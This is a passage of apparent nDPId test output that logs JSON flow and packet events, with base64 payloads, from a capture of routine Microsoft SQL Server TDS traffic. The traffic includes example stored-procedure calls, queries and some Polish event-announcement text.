AAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvAGQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="}
02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="}
00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="}
00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7560000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBu